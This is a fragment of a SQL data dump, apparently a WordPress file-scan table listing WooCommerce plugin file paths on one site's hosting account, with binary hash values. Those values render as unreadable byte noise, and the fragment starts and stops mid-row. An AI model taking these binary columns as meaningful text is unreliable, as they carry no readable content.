','DP.hc%0ʹBU)s\"M','',0,'?'),('m<۠Qqp@','wp-content/plugins/woocommerce/assets/js/select2/select2.full.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/select2/select2.full.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S#G`\0עRxmc','I;QYk^P&~ɮ?W','',0,'?'),('-Uqa\Z>c','wp-content/plugins/woocommerce/assets/js/select2/select2.full.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/select2/select2.full.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*ٸ)0ә{I',')@xZʩ A髮;Tf','',0,'?'),('Y^XzS','wp-content/plugins/woocommerce/assets/js/select2/select2.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/select2/select2.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ms','ߚv+2*,_i\nzVGV >','',0,'?'),('/Gy9ǚxX','wp-content/plugins/woocommerce/assets/js/select2/select2.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/select2/select2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߻`mSk','\'tSAXyTg,DI7]9','',0,'?'),('h|5\\|qۛ','wp-content/plugins/woocommerce/assets/js/selectWoo/selectWoo.full.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/selectWoo/selectWoo.full.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\":X5XRƒ','?Y_8ޡiw\nCUMoG','',0,'?'),('yKEoeHeQ','wp-content/plugins/woocommerce/assets/js/selectWoo/selectWoo.full.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/selectWoo/selectWoo.full.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-fU\"?\n',']D %zGH3y\nveag','',0,'?'),('ȡH(bea|\'','wp-content/plugins/woocommerce/assets/js/selectWoo/selectWoo.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/selectWoo/selectWoo.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RSwN','&iLHC\ZR2 #%||MC','',0,'?'),(')R1+QMezAN','wp-content/plugins/woocommerce/assets/js/selectWoo/selectWoo.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/selectWoo/selectWoo.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1C^d|ԅh','30d42q,;\"*_.Kcc','',0,'?'),('kq\\7n2G','wp-content/plugins/woocommerce/assets/js/stupidtable/stupidtable.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/stupidtable/stupidtable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yRN5H@s','/B˸{YzPkGLyom\nH','',0,'?'),('ölyk!̏zh','wp-content/plugins/woocommerce/assets/js/stupidtable/stupidtable.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/stupidtable/stupidtable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t4Xi&8e#KQ|','饵w+7E;\ZMqv-]׎I# Bm$','',0,'?'),('D\Zl*Zq','wp-content/plugins/woocommerce/assets/js/zoom/jquery.zoom.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/zoom/jquery.zoom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y\"VJ߿Zn','rrbJܻ>Â^#U`X=','',0,'?'),('ڻdZH','wp-content/plugins/woocommerce/assets/js/zoom/jquery.zoom.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/zoom/jquery.zoom.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pmN nc\\}k','Y-Oԓ\'OC7x8q=fk1n','',0,'?'),('3~Bbu]7>DX','wp-content/plugins/woocommerce/client/admin/config/core.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/client/admin/config/core.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>:j\ZcX','K%$O4aDU0','',0,'?'),('V$\n`9)','wp-content/plugins/woocommerce/client/admin/config/development.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/client/admin/config/development.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tHK s/R','ZyTՔk1(ji݆?CwO\\/','',0,'?'),('\0s],=u','wp-content/plugins/woocommerce/i18n/continents.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/i18n/continents.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^\rͭ?W\Z','WHvqޢ7?sӄt1','',0,'?'),('#k{l=-|H_>\rKq','',0,'?'),('̌T%','wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-data.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']ګsF^P','\"*wc/`%펧,/;/?E\nn','',0,'?'),('l_#oݩDא','wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-deprecated-hooks.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-deprecated-hooks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ro\"0w@','/7̮fW%Ry{~LQOdxeH','',0,'?'),('u2~|3','wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-integration.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wg!WJ\0','PicѠ\nt>0zX','',0,'?'),('F›pbuy','wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-log-handler.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-log-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7m;[Ҳq4h','Ie)K;f rj H8VLBW#e','',0,'?'),('F\ng]K','wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-object-query.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-object-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#\\{Vˉl','6 -X!a\'w1O.I','',0,'?'),('83(2=X<4\0b','wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-order.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-order.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','뙊G93ͅc^','&KghP+IC:Kya9l','',0,'?'),('U1ԘwgOYpA','wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-payment-gateway.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-payment-gateway.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u*;D_kAb-','qE_zv)k=hB>R&e!','',0,'?'),('UfT^1\0=6','wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-payment-token.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-payment-token.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ec\rJ','q2PE=48߉z~@','',0,'?'),('t9.qiBf','wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-privacy.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WsRZ*ְYh1','r<<\"\\7JH55 {','',0,'?'),('e\Zϧ\0}y','wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-product.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-product.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S=QC>\r2','Z%^ThWb.Q%%oنVL*','',0,'?'),('$:SZܽr2^','wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-session.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-session.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E9i伟$','i \0JD5;ԏ4=`4','',0,'?'),('n]A!2=W','',0,'?'),('?YkÅ5y+','wp-content/plugins/woocommerce/includes/abstracts/class-wc-background-process.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/abstracts/class-wc-background-process.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TѨ{\" yV#','aSvgԇ1?U4`[>x','',0,'?'),('+^2s1\0','wp-content/plugins/woocommerce/includes/admin/class-wc-admin-addons.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/class-wc-admin-addons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ă1WqEZ','2^zwhdS-aaMf&\0\Z輵8x^','',0,'?'),('w Cs>͒K','wp-content/plugins/woocommerce/includes/admin/class-wc-admin-api-keys-table-list.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/class-wc-admin-api-keys-table-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',m V&)|','oN3cSK<:3V(','',0,'?'),('0:.T$ Ga','wp-content/plugins/woocommerce/includes/admin/class-wc-admin-api-keys.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/class-wc-admin-api-keys.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i>`Ep','2#֍jfֈ]|RY,˗X0&8','',0,'?'),('-s-Qe74t','wp-content/plugins/woocommerce/includes/admin/class-wc-admin-assets.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/class-wc-admin-assets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J\\a2ApAt','\rZEy=?ZQmpT','',0,'?'),('T\\T=4FDLP','wp-content/plugins/woocommerce/includes/admin/class-wc-admin-attributes.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/class-wc-admin-attributes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qЎ/&@o5zF\n|R','Y$du\Z榪\0#ޔkk.At?','',0,'?'),('de\'R:Zm k','wp-content/plugins/woocommerce/includes/admin/class-wc-admin-customize.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/class-wc-admin-customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KeJM[4/','0YG$1)T=:f\n<}','',0,'?'),('f5\rG]}L','wp-content/plugins/woocommerce/includes/admin/class-wc-admin-dashboard-setup.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/class-wc-admin-dashboard-setup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r\0up=eY','4#,1Oqcڡ/%UcFl;);','',0,'?'),('cBm)cЪ\'','wp-content/plugins/woocommerce/includes/admin/class-wc-admin-dashboard.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/class-wc-admin-dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';VB8z9t','罧UetƾeB\\$6p','',0,'?'),('ӎ=GK@VS','wp-content/plugins/woocommerce/includes/admin/class-wc-admin-duplicate-product.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/class-wc-admin-duplicate-product.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(V&{O','f9eB!jjL,','',0,'?'),('0vԩ9F','wp-content/plugins/woocommerce/includes/admin/class-wc-admin-exporters.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/class-wc-admin-exporters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vVA@}','\rKT,g\\:~v\ZVrA','',0,'?'),('^>/㱎JjB','wp-content/plugins/woocommerce/includes/admin/class-wc-admin-help.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/class-wc-admin-help.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&+n\rcsz\0/','Q:pL!|EIl%868Jh','',0,'?'),('EvupTf9a:','wp-content/plugins/woocommerce/includes/admin/class-wc-admin-importers.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/class-wc-admin-importers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g/y\",','K :r2do>Ut ','',0,'?'),('*ljb%5','wp-content/plugins/woocommerce/includes/admin/class-wc-admin-log-table-list.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/class-wc-admin-log-table-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'h|GSa','T>3Az3NA9gf![Ky','',0,'?'),('iѧ9$z','wp-content/plugins/woocommerce/includes/admin/class-wc-admin-menus.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/class-wc-admin-menus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S O`VA`u%','ԵV?ӊq!UEخv','',0,'?'),('$+)Jd;\\ՖD','wp-content/plugins/woocommerce/includes/admin/class-wc-admin-meta-boxes.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/class-wc-admin-meta-boxes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sWKH;zv','3[=BԶ;(\n\nx{Z]','',0,'?'),('iFh<}ދT','wp-content/plugins/woocommerce/includes/admin/class-wc-admin-notices.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/class-wc-admin-notices.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ka}Р9','ķ{#O\\v˷f%?{:MRgO','',0,'?'),('>kjr{','wp-content/plugins/woocommerce/includes/admin/class-wc-admin-permalink-settings.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/class-wc-admin-permalink-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s`oT\\T #F\'','',0,'?'),('GCNqÊE5}','wp-content/plugins/woocommerce/includes/admin/class-wc-admin-pointers.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/class-wc-admin-pointers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*v)$#0S','nu-Ey0+0?OhG','',0,'?'),('P5Vb','wp-content/plugins/woocommerce/includes/admin/class-wc-admin-post-types.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/class-wc-admin-post-types.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\N^H<`5','U','wp-content/plugins/woocommerce/includes/admin/class-wc-admin-status.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/class-wc-admin-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7N %\05U/{','yԽp{ht\n}E๮]#','',0,'?'),('G\'J0\r|MK','wp-content/plugins/woocommerce/includes/admin/class-wc-admin-taxonomies.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/class-wc-admin-taxonomies.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OB0\01','rF-ܖj[_\'@b\\7','',0,'?'),('FI@OR}tadW','wp-content/plugins/woocommerce/includes/admin/class-wc-admin-webhooks-table-list.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/class-wc-admin-webhooks-table-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5am`;?9W','Zw*ω{pwex)7#vHw|&i','',0,'?'),('N2_]]b>','wp-content/plugins/woocommerce/includes/admin/class-wc-admin-webhooks.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/class-wc-admin-webhooks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j̆]^kh',' #0\ZpTό)ՓK*PN<_ES','',0,'?'),('ir RR)&8K','wp-content/plugins/woocommerce/includes/admin/class-wc-admin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/class-wc-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=ih@ܑƣ','agFI{<ꋨl^xPn, ks','',0,'?'),('>5TQiK{R ','wp-content/plugins/woocommerce/includes/admin/helper/class-wc-helper-admin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/helper/class-wc-helper-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-DŽm2bڷ=W','mSѵ+,6J\\D_e','',0,'?'),('(~kpG','wp-content/plugins/woocommerce/includes/admin/helper/class-wc-helper-api.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/helper/class-wc-helper-api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q.S#\ZM%','T*T\\,ǍJf?g','',0,'?'),('\\Ft','wp-content/plugins/woocommerce/includes/admin/helper/class-wc-helper-compat.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/helper/class-wc-helper-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ebXh3 C a+Q','\\,PErx \0K\"Vg Ȍ;?h','',0,'?'),('kĸ.!b$s','wp-content/plugins/woocommerce/includes/admin/helper/class-wc-helper-options.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/helper/class-wc-helper-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yTrb5 2W\r|','>&k4+ňGr\'YrMT\r','',0,'?'),('MZn|/1m9e','wp-content/plugins/woocommerce/includes/admin/helper/class-wc-helper-plugin-info.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/helper/class-wc-helper-plugin-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4&\ZCsC1','dNSѐflbΧb!HH5/\"ώ','',0,'?'),('W6Vʳ.̃','wp-content/plugins/woocommerce/includes/admin/helper/class-wc-helper-updater.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/helper/class-wc-helper-updater.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S _IVV!','Vo]&POe','',0,'?'),('-:)N6','wp-content/plugins/woocommerce/includes/admin/importers/class-wc-tax-rate-importer.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/importers/class-wc-tax-rate-importer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/|ΕqW4','\r$cN]h\\O1GU&D,\\','',0,'?'),('rlYh','wp-content/plugins/woocommerce/includes/admin/importers/mappings/default.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/importers/mappings/default.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K}&ޑ\"[@','c5tl (19L+y','',0,'?'),('?`uH)\'J','wp-content/plugins/woocommerce/includes/admin/importers/mappings/generic.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/importers/mappings/generic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wilj6Tbmh',' R\'˯n\"}z','',0,'?'),('pԔR۠\"','wp-content/plugins/woocommerce/includes/admin/importers/mappings/mappings.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/importers/mappings/mappings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4qDR9|','0m\\ÖⷘҩB','',0,'?'),('XʪrSHt?','wp-content/plugins/woocommerce/includes/admin/importers/mappings/shopify.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/importers/mappings/shopify.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z\0$SYKv܈','9,kdZei|T7A1S?[Q','',0,'?'),('GWXc(n`','wp-content/plugins/woocommerce/includes/admin/importers/mappings/wordpress.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/importers/mappings/wordpress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L B)zkH','Ab\0ʆPOTe\Z a}\Z','',0,'?'),('=Fv$k','wp-content/plugins/woocommerce/includes/admin/importers/views/html-csv-import-done.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/importers/views/html-csv-import-done.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ENIFY.A','MeS\'1y,O8?PP~','',0,'?'),('\"(\0','wp-content/plugins/woocommerce/includes/admin/importers/views/html-csv-import-footer.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/importers/views/html-csv-import-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(hv$mpn+w','ӥ?$VOnkmJt̶','',0,'?'),('~W.\r','wp-content/plugins/woocommerce/includes/admin/importers/views/html-csv-import-header.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/importers/views/html-csv-import-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m;\rheHf','FyF1Iv%hd弸','',0,'?'),('MEyqq~','wp-content/plugins/woocommerce/includes/admin/importers/views/html-csv-import-mapping.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/importers/views/html-csv-import-mapping.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eƹҿ.Q(&','rEOz K>Sl\0F,v\n','',0,'?'),('m5~}a','wp-content/plugins/woocommerce/includes/admin/importers/views/html-csv-import-progress.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/importers/views/html-csv-import-progress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3#YA޿`iOF |','kځfyw]VL%NG L','',0,'?'),('x,Gڄ;6?','wp-content/plugins/woocommerce/includes/admin/importers/views/html-csv-import-steps.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/importers/views/html-csv-import-steps.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EKdvFlql','+ [\'&Gjvscl1Գp','',0,'?'),('A\\ )lCtg(oF','wp-content/plugins/woocommerce/includes/admin/importers/views/html-product-csv-import-form.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/importers/views/html-product-csv-import-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I%Ώ\Z0\r Gq',',oC&yӫ9\'\Z]!Z8\\TZo:Q','',0,'?'),('@h\Z4Apᔙo','wp-content/plugins/woocommerce/includes/admin/list-tables/abstract-class-wc-admin-list-table.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/list-tables/abstract-class-wc-admin-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Sny','aO/ڪ','wp-content/plugins/woocommerce/includes/admin/list-tables/class-wc-admin-list-table-coupons.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/list-tables/class-wc-admin-list-table-coupons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"ǓPD s',' ǞTdF\nUW}_B/ȋk4\n\":R','',0,'?'),('p$&PMɸW','wp-content/plugins/woocommerce/includes/admin/list-tables/class-wc-admin-list-table-orders.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/list-tables/class-wc-admin-list-table-orders.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n\rH=]','h\r%=?.;81,,\n<Ó05B','',0,'?'),('ۃ*ftȞ','wp-content/plugins/woocommerce/includes/admin/list-tables/class-wc-admin-list-table-products.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/list-tables/class-wc-admin-list-table-products.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uIZEA','%;)vȄZ{>`R]=u!','',0,'?'),('u\n0Ž4Ln','wp-content/plugins/woocommerce/includes/admin/marketplace-suggestions/class-wc-marketplace-suggestions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/marketplace-suggestions/class-wc-marketplace-suggestions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GGEږ)eҧ','w*˜zM6\ZU$In b','',0,'?'),('E\" MP,6V$','wp-content/plugins/woocommerce/includes/admin/marketplace-suggestions/class-wc-marketplace-updater.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/marketplace-suggestions/class-wc-marketplace-updater.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']ClTO-A',' y;+\ZRդrEX,/','',0,'?'),('A\0xc\"D\Z','wp-content/plugins/woocommerce/includes/admin/marketplace-suggestions/templates/html-product-data-extensions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/marketplace-suggestions/templates/html-product-data-extensions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4~Urp','p\"V1`5\r','',0,'?'),('g}y7Q`iHu','wp-content/plugins/woocommerce/includes/admin/marketplace-suggestions/views/container.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/marketplace-suggestions/views/container.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'x*3g‘+;','VOdu֤*K$G\"SE','',0,'?'),('hu_@','wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-coupon-data.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-coupon-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0?;!','Rz PMJ,c5)tt04$-','',0,'?'),('ʂ-=Υ','wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-order-actions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-order-actions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','۴ϋC[e:J',' \0Z>⽝(k %g-X','',0,'?'),('vZ59FG','wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-order-data.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-order-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tDw 7.:','p N\nUJ(uQTss_HBe 0oJyģ','',0,'?'),('xX$:㈳o','wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-order-downloads.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-order-downloads.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n=bH(Hpװd','9ߒ6t5 ļ:u/|)','',0,'?'),('eH9[1','wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-order-items.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-order-items.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U]D%ΗK','/)5A\rwCV5xϳJםnBh*','',0,'?'),('US?^Qwo_','wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-order-notes.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-order-notes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nIkab','{?3ଙ@UX8ĉ_','',0,'?'),('ݗ(N=V/ :1','wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-categories.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-categories.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ocu','Jt=랽L:1mKUWYr','',0,'?'),('wzOw(q+','wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-data.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CHIAl','=Rq\n<P4\0#&bcI)','',0,'?'),('۠5D꘎˵>mD','wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.4(%2AZrC:','',0,'?'),('(4\ZoKpk}j','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-download-permission.php','/home/tummmyov